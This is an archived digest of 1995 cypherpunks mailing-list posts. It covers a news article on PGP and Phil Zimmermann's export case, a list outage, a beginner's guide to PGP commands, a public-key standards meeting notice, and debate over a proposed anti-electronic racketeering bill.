Message-ID: <01HSV0ZF4V7M937K02@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

hello all,

nothing new here. there are some obvious errors in this article, most
notably that it claims phil z. uploaded pgp to the internet, while
phil claims this is not so. 

anyhow, i figure mention in the mass press is reason enough to post
here...


===begin===
Date: Thursday, 13-Jul-95 05:12 AM


Encryption software keeps unauthorized readers out of your e-mail

I think you've known me long enough to trust me. So I hope you won't
mind letting me read your mail. 

What's that? You object to my reading your mail? You say that your
private correspondence is none of my business? 

Fair enough. I feel the same way about my mail. That's why I put my
letters in envelopes. But what about the messages we exchange over
computer networks? 

Any computer is a profoundly insecure place for storing private
information.  As more people communicate over computer networks, they
expose themselves to severe embarrassment, or worse. A determined
government agency or corporation could tap the Internet or other data
networks, and gather all manner of financial, political or personal
information. 

But the same technology that makes this snooping possible is making it
possible for people to make communications virtually unreadable by
anyone except the people they're meant for. 

It's done using software that encrypts information _ turns it into a 
collection of gibberish. But this mishmash of symbols can be read by
someone who possesses the key, a kind of electronic letter-opener. 

Encryption has been around quite awhile. The first coded messages we
know about were sent by the soldiers and diplomats of Sparta about
2,400 years ago.  But few private citizens have ever bothered to
write in code. Most of us don't have many secrets. And the few we do
have aren't important enough to justify the immense complexity of a
really good code system. 

But when you have millions of people swapping E-mail on easily tapped
computer networks, attitudes start to change. Especially when the
computer itself can encode your messages in a form that's nearly
unbreakable. 

The idea is to apply an algorithm, or mathematical formula, that can
be used to code and decode any message. By the way, you don't have to
keep the formula secret. If the algorithm is really good, it won't
matter if a potential code-breaker knows it by heart. Run a message
through the algorithm, and even an expert code-breaker will need the
key to read it. 

Traditionally, going for the key has been the best way to break a
code. British and American researchers during World War II figured
out the keys to the German Enigma coding machine, and read Hitler's
mail. 

But in 1971, Whitfield Diffle and Martin Hellman came up with a much
tougher coding scheme, called public key cryptography. It relies on
two keys. One, the public key, is used only to encode messages. You
give this key to everybody who wants to send you a coded message. 

But the public key can't be used to read messages. For that, you use a
second, private key. When you receive a coded message, you run it
through your coding program along with your private key. 

Each key is a collection of letters and numbers generated by the
coding program. The longer the keys, the tougher it is to break the
code. But even a state-of-the-art public key system can be broken.
All you'll need is a supercomputer and several million years _ the
time it'll take to work through every possible solution. 

It also takes a fair amount of computing power to use a public key
system.  When Diffle and Hellman came up with the idea, only
corporations and governments had computers capable of the job. Now,
millions of us do. 

In addition, we now link these machines together over worldwide
networks.  Millions of us use computer networks to make credit-card
purchases, exchange business data, or write love letters. All of
which means we need a way to ensure that information we send can be
read only by those it's aimed at _ cryptography for the masses. 

And now we have it, thanks to Philip Zimmermann, anti-nuclear
activist, software engineer and author of Pretty Good Privacy (PGP).
It's a program many cryptography experts consider well-nigh
unbreakable. 

You can order a commercial version of PGP from ViaCrypt, an Arizona
company.  You pay $100 for the DOS version, $125 for Windows or Mac.
Call 1-602-944-0773, 10-7 weekdays. 

But the original PGP program is freeware. You can download it at no
charge from the Massachusetts Institute of Technology's FTP site
(net-dist.mit.edu, in the pub/PGP directory) or from the National
Computer Security Association Forum on CompuServe. The latest version
is called PGP262.ZIP. 

When you try to download PGP, you'll be asked whether you're a U.S.
citizen.  If you don't answer yes, you won't get the program. 

MIT and CompuServe don't care if you're phoning in from Jupiter.
They're just trying to protect themselves. They don't want to end up
like Zimmermann, who has spent the last three years trying to keep
out of jail. 

It all began in 1991, when Zimmermann was designing PGP. He heard
Congress was considering a law to ban the use of encryption software.
His left-wing instincts roused, Zimmermann quickly finished his
program, and then uploaded it to an Internet site. Once unleashed, no
government would be able to restrict PGP. 

Sure enough, PGP was soon being used by people all over the United
States. No problem _ the bill never passed. But when Internet users
outside the U.S.  started downloading it, the federal government put
the Zimmermann case in front of a grand jury. 

It seems that selling encryption software to foreigners is a federal
crime, on the same scale with peddling plutonium. The fact that
Zimmermann didn't sell PGP may or may not help him. The grand jury
has been at work since 1992, trying to decide whether to issue an
indictment. Zimmermann could get up to four years in prison. 

It's easy to denounce this assault on freedom, but the authorities
have a point. Most PGP users are honest citizens with a taste for
privacy. But the coding and encoding software works just as well for
terrorists, mobsters or child molesters. Cheap, powerful encryption
software will make life a lot tougher for the people who work to keep
us all safe. 

But then, the cops would also have an easier job if we all just agreed
to let them open everybody's mail. How about it? 

X X X 

(You can send electronic mail to Hiawatha Bray. If you're on the
Internet, send it to: watha(at)det-freepress.com; On Compuserve,
write to: 72662,2521; America Online users, write to: WathaB.) 

KNIGHT-RIDDER-WASHINGTON--07-12-95 0914EDT 
   -0- By Hiawatha Bray Knight-Ridder Newspapers

*** End of story ***




-----BEGIN PGP SIGNATURE-----
Version: 2.61

iQEVAwUBMAZbCigP1O9KJoPBAQHe+wf/bICqNHngGDGaK6ECIOy39OhHPdHxzdMw
zlU3ptgGrFpSmKyb1PqXSK3U41QfPCC2WDTLcxtxZHfE7J1DHkiptBvcwB5Sm6wJ
4i6PnCgCoot9EX4I8iG+WwAoujIUsDg2/7xoO6ba5daykFTBeeSw8iGac4O6j4aX
bz2JSpr3DsSQK7neB2HdeXp3Ovp7/qwM8Hx0nKn5ml/otFl6DUk6+7khLo5CvRG7
ei+aRMxn3H0B6EsFqB5s///RA3MuM1327ZzqAubIBaXpCU0VNK6M462oDDh8cTu1
u6gCnGKS5pT8imFBID8vu0S2P8ME8opl937B/aGrYhgzvoI2oZ0NKA==
=I6XV
-----END PGP SIGNATURE-----
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Fri, 14 Jul 95 11:25:25 PDT
To: cypherpunks@toad.com
Subject: List Crash?
Message-ID: <9507141823.AA01659@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



I see the cypherpunks' mailing list lost it's mind again.  It has been
awhile since this happened.

Was it an accident or sabotage?

Loren




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 14 Jul 95 12:41:37 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: DOH!
Message-ID: <Pine.ULT.3.91.950714144121.10730C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I see that the subscription rolls got nuked again.  *sigh*

Did I miss anything juicy after the rants of yesterday?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAbIizokqlyVGmCFAQHHUAQA0gTXvdTsIfY+l2yKXhbVcYJh38Ud1Tx9
ald4e52YaTW2256rOxmuoN1pBSu1rnpjWkEytHRHJ12rkLSrocAKT66Xk0wW0o7t
Pml8gLFlpX4XznmTNkGV36Vv7s0ly+sDsJxd4R8WIXEpCr77I9Pyc1WIiJW3Oo/1
gJFHp0vBCzE=
=qLuY
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Fri, 14 Jul 95 13:11:04 PDT
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <Chameleon.4.01.2.950714150955.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


"Overweaning."  "Iowa."  Yes, yes, I know.  Fingers think for 
themselves.  Too used to typing "weenie."  Just read DOJ report.  Don't 
write.

Bolivar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 12:07:23 PDT
To: cypherpunks@toad.com
Subject: Toad Hit?
Message-ID: <199507141907.PAA15038@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there an after-action report available?



Responding to msg by Majordomo@toad.com () on Fri, 14 Jul 11:58 
AM

>--
>
>Your request of Majordomo was:
>>>>> who cypherpunks
>Members of list 'cypherpunks':
>
>Panu.Rissanen@lut.fi
>hugh
>eric@remailer.net
>gnu
>losburn@omcssi.com
>adwestro@ouray.cudenver.edu
>krs@caos.aamu.edu
>hfinney@shell.portal.com
>tomb@syntec.com
>hank@rumple.org
>tcmay@sensemedia.net
>heling@harry.sar.usf.edu
>bbrown@gtenet.com
>cypherpunks@cs.du.edu
>rittle@comm.mot.com
>bdolan@use.usit.net
>jfleming@copper.ucs.indiana.edu
>jya@pipeline.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Fri, 14 Jul 95 12:40:07 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Root Causes
In-Reply-To: <199507140151.UAA01504@arnet.arn.net>
Message-ID: <Pine.3.89.9507141530.A8090-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain


I think this is a good idea...

On Thu, 13 Jul 1995, David K. Merriman wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> While I respect the ideas and opinions submitted by the majority of the
> members of this list, I wonder if perhaps we're failing to deal with the
> _root_ problem of such things as the CDA, Clipper, DTA, etc.
> 
> Specifically, I wonder if it wouldn't be a better approach to *prevent* such
> measures from ever being proposed in the first place.
> 
> (pause to adjust nomex undies and titanium body armor :-)
> 
> Is there any precedence or possibility of either filing civil or criminal
> charges against a Government official for their _official_ actions?
> Something that will not only make for some Serious Press, but hit them from
> an unexpected angle?
> 
> (close hatch on bunker :-)
> 
> It would seem that things such as the CDA, etc, are patent violations of the
> Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such
> measures be violating our civil rights, and thus be criminally liable?
> Aren't Congressrodents supposed to take an Oath of Office that involves
> upholding the Constitution?
> 
> Alternatively, could a civil suit be filed for invasion of privacy or
> somesuch? Or perhaps the previously mentioned violation of civil rights (a
> la Rodney King)?
> 
> How many laws, etc, can we invoke? I mean, most congresscritters don't craft
> laws on their own, so the involvement of their staff would constitute
> conspiracy, as well, wouldn't it?
> 
> I'd think that if a few of the <insert favorite expletive here> were sued
> and/or tried, it would sure make the rest of them consider the full
> implications of any laws they might consider proposing. Too, it might
> accidentally ripple through all of the Government, and settle down some of
> the beaurocrats that aren't subject to voters.
> 
> IANAL, of course, so I'll leave it up to those on the list who are to
> express more informed opinions; still, it _seems_ like a possible course of
> action.....
> 
> Dave Merriman
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMAWqT8VrTvyYOzAZAQFPiwQAluzkD3H+AcUFr7qNhf84I7Y3FNB27Lxc
> jQQ5UQnYgvQpHhlExJGmxDjebbOgbOik5Xu2KoQYbdutc/LBWHN6OzfLWim9jWwq
> C1nKEnDUo1jKQ+LcsV0/TGrwKPUYVnOhswZPydn50xnKF3KuW17RnXFeYJi+DTdZ
> D3YtxRa2shc=
> =JiVo
> -----END PGP SIGNATURE-----
> This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
> of the PGP executable. See below for getting YOUR chunk! 
> ------------------ PGP.ZIP Part [015/713] -------------------
> M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
> MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
> M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 
> 
> 

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Fri, 14 Jul 95 14:01:14 PDT
To: Govaccess@well.com
Subject: Free The World Web Server project.. :)
Message-ID: <Pine.3.89.9507141638.A8442-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain



15:57 EST
July 14th, 1995
New Haven, CT. 

	From the Yale Computer Center:

	Got an idea for y'all, from the heart and mind of Elizabeth 
Walker, with whom I live.

	 Let's set up a web site where someone can submit a letter that 
will be automatically sent to every senator, congressperson, elected and 
appointed federal official. If we run into trouble, we can scale it down, 
narrow the various target areas...

	Also, we could write our own letters, post them, and if someone 
wants to resend it, they could do so at the click of the mouse.

	Example, someone logs on to the Freedom Speaks webserver, and is 
greeted by the message, "Welcome, enter your message for Federal 
officials in the box provided, then hit the submit button." 

	"If you would like to submit one of our pre-written letters, just 
click on any of the ones you see below." 

	For those without web access, we could set up a mailing list to 
do the same.

	 I.e. to send a message to all our elected and appointed 
officials, send message to freetheworld@gateway.net. From there it gets 
spooled everywhere. What do you think? I could probably do it somehow, 
but someone with access to better resources and knowledge of cgi-bin 
might be better for the job. If anyone is interested in this project, let 
me know...

			R. Leland Lehrman

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roger@coelacanth.com (Roger Williams)
Date: Sat, 15 Jul 95 22:03:54 PDT
Subject: Re: speeding detected by civilians
In-Reply-To: <Pine.SUN.3.91.950713150252.17575B-100000@crl8.crl.com>
Message-ID: <rogerohyxp80a.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <3u4g3t$pn8@nntp.crl.com> Buzz@static.noise.net (Buzz White) writes:

   >> Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
   >> citizens to check out radar guns from the local police department to 
   >> catch speeders in their community. The radar guns are combined with 
   >> cameras in order to instantaneously capture the car, license number, and the 
   >> rate of speed. The citizens can check out the units for a week at a time. The 
   >> police have stated that they, at this time, will use the data to issue 
   >> warning letters to the violaters.

   Can they use them to bust COPS that speed?   Heh heh.

If Vernon Hills has any citizens left with spines, you can bet that
the local police are going to start to get a couple hundred pictures
of cop cars per week... Hell, I'll bet that I could take that many
by *myself* :)

-- 
Roger Williams  --  Coelacanth Engineering  --  Middleborough, Mass

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh@ecotone.toad.com (Hugh Daniel)
Date: Fri, 14 Jul 95 17:17:00 PDT
To: cypherpunks@toad.com
Subject: ADMIN: List wipeout and recovery
Message-ID: <9507150012.AA03568@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  Yeghads, it happened again.  Last night at about 22:47 the disk
partition that holds the cypherpunks mail list filled up and when
someone tryed to sub/un-scribe using Majordomo the list got zeroed.
  No one broke into the system to do any evil, it's just confusion,
rotten software and poor management by yours truley that casued the
problem.
  Next problem was that toad.com had changed a lot in the last 9
months, and we had moved things about in such a way that I did not
seem to have any backups of the file!  Today our gracious host, John
Gilmore called up to see what the problem was and if there was any way
to fixit.  Using two heads was better than one and we realized that we
had a online backup only 2 days old.  Minutes later it was installed
and the list is back to where it was late on 1995/07/11.

  So, some of you will need to un-subscribe again, our apologies about
that.  I will dig out the lost messages and make a digest-ish like
post of everything that was posted since about 22:30 last night.

  I will also look at moving away from MajorDomo as list software due
to its being moribund, old, stupid and bothersome!

  Thanks also goes to L. McCarthy <lmccarth@cs.umass.edu> for sending
pleasant email to the right folks (majordomo-owner@toad.com is best)
to lets us know that there was a problem.

  If you have any questions please send them directly to me as the
list is allready full of off topic posts (big hint folks...).

		||ugh Daniel
		Majordomo Potty Trainer
		majordomo-owner@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Fri, 14 Jul 95 14:44:19 PDT
To: Steven Champeon - Imonics Development <schampeo@imonics.com>
Subject: Re: Eudora MacPGP Woes
In-Reply-To: <9507141334.AA07025@fugazi.imonics.com>
Message-ID: <Pine.SUN.3.91.950714174307.3458A-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 14 Jul 1995, Steven Champeon - Imonics Development wrote:

> Date: Fri, 14 Jul 1995 09:34:59 -0400
> From: Steven Champeon - Imonics Development <schampeo@imonics.com>
> To: unicorn@access.digex.net, hal9001@panix.com
> Cc: cypherpunks@toad.com
> Subject: Re: Eudora MacPGP Woes
> 
> 
> |   From: "Robert A. Rosenberg" <hal9001@panix.com>
> |   Subject: Re: Eudora MacPGP Woes
> |   
> |   At 14:40 7/8/95, Black Unicorn wrote:
> |   >I have noticed that an X-Attachement: header is added, but I have no idea
> |   >how to remove it without opening the Eudora outbox with teachtext or
> |   >something.
> |   
> |   Highlight the file name on the attachments line and hit delete to remove an
> |   attached file request.
> 
> I guess I'm still confused about why there's an X-Attachment: header being
> added. If the file is being generated by MacPGP without using the Applescript,
> you can simply open the resulting encoded file (provided it is being ascii-
> armored) from within Eudora then copy and paste it into an open Compose
> window. Voila. No X-Attachment: header. If you delete the file name on the
> attachments line, it also removes the attachment.
> 
> Mr. Unicorn: have you had any luck with the Applescript? You might try
> booting without extensions (except for Applescript) and open Eudora
> off-line and keep trying. 

Now that I have begun using the PGPkit versions of the scripts, all is 
well.  No idea what caused the headache.

> 
> Hope this helps,
> Steve
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 14 Jul 95 18:11:56 PDT
To: The Gate <bdolan@use.usit.net>
Subject: Re: Mr. Newbie...
Message-ID: <199507150109.SAA06854@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 PM 7/13/95 -0400, The Gate wrote:
>
>	Okay folks, here comes Mr. Newbie.
>
>	Duh...How can I figure out how to use pgp. Is there a good place 
>to learn the background and basics in a step-by-step easy to understnad 
>way? Duh... I think I wanna know...

The documentation that comes with PGP isn't bad; read the pgpdoc1 and
pgpdoc2 files.
(If you buy ViaCrypt, you get them in nice spiral-bound manuals, but it's
basically
the same stuff.)  Here's an overview of the basics:
- RSA public-key encryption lets you create a public encryption key which you
can publish, so that other people can encrypt files that can only be decrypted
with your private key.  It also lets you sign files by decrypting them with your
private key, which other people can check by encrypting with your public key
to get the original message (or a hash of it) back.  What makes this
mathematically
cool is that it does it in a way that takes exponentially long amounts of time
to find your private key from the public key, so anybody who wants to crack
a reasonably
long key needs to run a big hairy computer for about the age of the planet
to do so,
but you can do decryption reasonably fast because you already know the
private key,
and the same algorithm works well for both encryption and digital signatures.

- RSA encryption isn't very fast, so most real programs that use it encrypt the
file with a conventional crypto algorithm (PGP uses IDEA) using a randomly
chosen
session key, and encrypt the session key with RSA; it's a lot faster.

- The problem with public-key encryption is that anybody who wants to send
you a message needs to be sure they've really got _your_ public key instead
of a key that some Bad Guy published saying "Here's Alice's public key -
trust me!".
Since RSA can do digital signatures, PGP uses them to create a "Web of Trust",
where you can sign a message saying "Here is Alice's key, signed Bob",
and anybody who's got a good copy of your key (and trusts you) will know they've
got a good copy of Alice's key.  If they didn't get a copy of your key directly
from you, they may have a message saying "Here's Bob's key, signed Carol",
or maybe they got that and Carol's key, signed by Dave, and they know Dave
personally so they've checked it with him.  How big a Web of Trust can you
trust?
Well, you probably need more security if you're running a revolution than if
you're trying to find out if a Usenet article is genuine or bogus, so PGP lets
you choose, but the default is 4 levels deep.

- OK, so how do you get PGP? - there's an occasional publication on the net
that tells you where, but you can get it from ftp.ox.ac.uk by ftp with no
hassle.
Inside the US, you want version 2.6.2 for non-commercial use, and you have
to buy
ViaCrypt's licensed version if you want to sell services using it.  Outside
the US,
the version's something like 2.6.2i or something ending in i.  3.0 will be out
"Real Soon Now", probably in 1995, but it's hard work.  Versions are available
for DOS, Mac, Unix, and a few less popular OSs.  ViaCrypt has a special
Windows version;
the rest of us Windows users can either run it from DOS or use a front-end
program
like Private Idaho (ftp.eskimo.com/joelm/) or WinPGP, available from popular
FTP sites.
If you're using the Unix version, it's assumed you know how to read readme files
and compile using Make; DOS folks get binary as well as source and
documentation.
Unix folks will notice that the command line has this ugly DOS feel to it :-)

- So you've got it installed and you've read the documentation, and messed with
the config.txt file if you didn't like the default options, and now
you want to do something.  Type "pgp -h" to get help, or "pgp -k" to get help
with keys for a reminder.  Then type "pgp -kg" to generate a key - you
probably want a 768-bit or 1024-bit key for normal use, unless you're
paranoid or
have a slow computer.  Because RSA keys are long strings of binary data that
are hard for humans to remember, PGP stores them in a file, encypted with IDEA,
and will prompt you for a "passphrase" for the encryption.  Make it something
long and complicated enough to be secure, but easy for you to remember without
writing it in a yellow sticky-note, and not blatantly obvious.  You'll need to 
use it any time you decrypt a file somebody else sent you, or sign a file you're
sending to someone else.  You'll also need a name - typical format looks like
        Bob Dobbs <jrd@slack.com>
which has your name and email address.  Most of the time you'll just use an
abbreviation and let pgp figure it out.  To send your key to someone else,
once you've generated it, type "pgp -kx Dobbs filename" and it'll create a file
you can mail somebody else which will let them encrypt stuff to you.

To decrypt a file you got from someone else, type "pgp filename",
which will do the right thing for decryption, checking signatures,
receiving new keys, etc.  To encrypt a file to someone else, type 
"pgp -e filename theirname" and pgp will create a file called filename.asc
(or filename.pgp if you don't have the ascii-armor option set, which you
should.)
To sign a file to send somebody, type "pgp -s filename", which will do the same,
and there are various options you should read in the manual.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 14 Jul 95 18:12:43 PDT
To: cjl <cjl@welchlink.welch.jhu.edu>
Subject: Re: ping
In-Reply-To: <Pine.SOL.3.91.950714190206.3736A-100000@welchlink.welch.jhu.edu>
Message-ID: <Pine.SUN.3.91.950714180937.21410A-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 14 Jul 1995, cjl wrote:

> However, I have not gotten any mail from the list today which leads me to 
> believe that there is something wrong with the list-server, you couldn't 
> all possible have been struck dumb with terror by the Your-ass-is 
> Grassley Act :-)

Nawh, We're all out celebrating Bastille Day.  Aren't you?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 14 Jul 95 18:50:53 PDT
To: cypherpunks
Subject: IEEE P1363 (public key crypto) standards meeting after Crypto
Message-ID: <9507150150.AA17439@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Even if you aren't going to Crypto, there are draft standards
documents, etc, FTP-able.  See below.  I haven't read them yet.

	John

Date: Thu, 13 Jul 95 10:56:18 PDT
From: Burt Kaliski <burt@rsa.com>
To: pem-dev@TIS.COM
Subject: Meeting announcement

  IEEE P1363: Standard for RSA, Diffie-Hellman and Related
                   Public-Key Cryptography


                       MEETING NOTICE

            Thursday, August 31, 1995, 1:00-6:00pm
            Friday, September 1, 1995, 9:00-6:00pm
         University of California, Santa Barbara, CA


This meeting of the P1363 working group, open to the public,
will focus on the editing of a draft standard for RSA,
Diffie-Hellman and other public-key cryptography. The
meeting follows the CRYPTO '95 conference, held August 27-31
at the same location.


AGENDA

    1. Approval of Agenda

    2. Approval of Minutes from May Meeting

    3. Officers' Reports

    4. Update on Patent Issues

    5. Proposals for New Sections

    6. Meeting Schedule

    7. Editorial Work (schedule to be determined based
       on availability of draft material)

    8. New Work Assignments

Depending on the amount of editorial work, the meeting may
end sooner than 6:00pm Friday.

If you'd like to participate, contact Burt Kaliski, the
working group's chair, at RSA Laboratories, 100 Marine
Parkway, Redwood City, CA 94065. Phone: (415) 595-7703, FAX:
(415) 595-4126, E-mail: burt@rsa.com.

Draft sections and copies of previous minutes are available
via anonymous ftp to ftp.rsa.com in the "pub/p1363"
directory. The working group's electronic mailing list is
<p1363@rsa.com>; to join, send e-mail to
<p1363-request@rsa.com>.

There will be a meeting fee, though the amount has not yet
been established, pending arrangements with the university.
It will also be possible for participants to arrange
accommodations at the university.


DIRECTIONS (excerpted from the CRYPTO announcement)

The campus is located approxmately two miles from the Santa
Barbara airport, which is served by several airlines,
including American, America West, United and US Air. All
major rental car agencies are also represented in Santa
Barbara, and AMTRAK has rail connections to San Francisco
from the north and Los Angeles from the south. Santa Barbara
is approximately 100 miles north of the Los Angeles airport,
and 350 miles south of San Francisco.

For more information on the CRYPTO '95 conference, contact
Stafford Tavares, the general chair, at (613) 545-2945 or
<tavares@ee.queensu.ca>.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 14 Jul 95 17:16:05 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507141958.MAA06431@comsec.com>
Message-ID: <9507142311.AA09635@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 13 Jul 95 11:19:29 -0400
>From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>


>>In the subsection that explicitly mentions crypto, it says that it's
>>unlawful to put (non-GAK) crypto on an open net, "regardless of whether such
>>software has been designated non-exportable". If the phrase "nonexportable"
>>means the same thing in the context of this subsection, then provision (b)
>>would only seem to apply RICO to stuff that already falls under ITAR.
>
>What worries me is the first sentence: "each act of distributing
>software is considered a predicate act."  


The crypto section has no GAK exclusion.  It makes it as illegal to release
GAKed crypto on a net as PGP.



I believe that the concern about defining predicate acts this way comes
from the RICO requirement that there be TWO instances of a crime in order
to pass the test of perpetrating a *pattern of crime* and therefore be
ranked as a mobster subject to RICO.  My guess is that the intent is that
from one placement on an FTP server or one posting to a newsgroup, the
perpetrator of that heinous act will have passed his RICO qualification and
therefore be subject to having all he owns taken from him.

-------

Meanwhile, the Federal civil forfeiture fund goes to good things.  The last
$9M (I believe it was) went to buying up AT&T DES phones to be made into
Clipper phones.  Of course, the conversion hasn't happened yet and the DES
phones are sitting in a warehouse someplace -- but the $9M fund went to
really good use, saving the world from AT&T DES.

(sarcasm off)

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Fri, 14 Jul 95 16:15:39 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: ping
Message-ID: <Pine.SOL.3.91.950714190206.3736A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,

It was my intention to write a little summary of the story in the most 
recent issue of SCIENCE, which in addition to reporting some progress 
towards constructing a quantum computer, also reports in a side bar on 
a Los Alamos demonstration of untappable quantum cryptography in which a 
message was sent over 14 kilometers of fiberoptic cable and read with a 
1% error rate, secure in the knowledge that Eve couldn't possible be 
listening.

However, I have not gotten any mail from the list today which leads me to 
believe that there is something wrong with the list-server, you couldn't 
all possible have been struck dumb with terror by the Your-ass-is 
Grassley Act :-)

So this is a test, this is only a test.  Had this been a real message I 
would have sent more details about the stuff in SCIENCE.

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 14 Jul 95 17:23:05 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507141952.MAA06381@comsec.com>
Message-ID: <9507142327.AA10694@tis.com>
MIME-Version: 1.0
